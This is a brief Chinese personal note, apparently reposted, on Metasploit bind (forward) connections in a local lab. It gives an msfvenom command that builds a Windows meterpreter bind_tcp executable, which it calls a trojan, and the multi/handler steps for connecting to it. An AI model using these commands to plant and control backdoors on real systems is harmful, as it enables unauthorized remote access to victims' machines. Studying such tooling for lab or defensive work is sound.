Metasploit正向連接


聲明:個人筆記,如果你看到請勿用於非法用途,出現一切后果與本人無關。

什么情況才能使用到正向連接:

目標不出網的情況下,防火牆關閉的情況下,開放某個流量少的端口情況下,如果目標只開放一個80端口,那么正向可能會失敗,因為80端口的流量太大,實戰中基本上正向連接很少。反向和正向的區別自行百度

本地靶機:msf實現步驟:生成正向muma命令:msfvenom -p windows/meterpreter/bind_tcp LPORT=80 -f exe -o shl.exe   (由於是本地環境所以我用80端口)

                                 監聽:use exploit/multi/handler

                                          set payload windows/meterpreter/bind_tcp

                                         set rhost 目標ip

                                         set rport 目標端口

                                         set lport  攻擊機端口

                                         run

效果如下

(注意windows可能會對版本號有影響,x84 x64 32有的不兼容)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM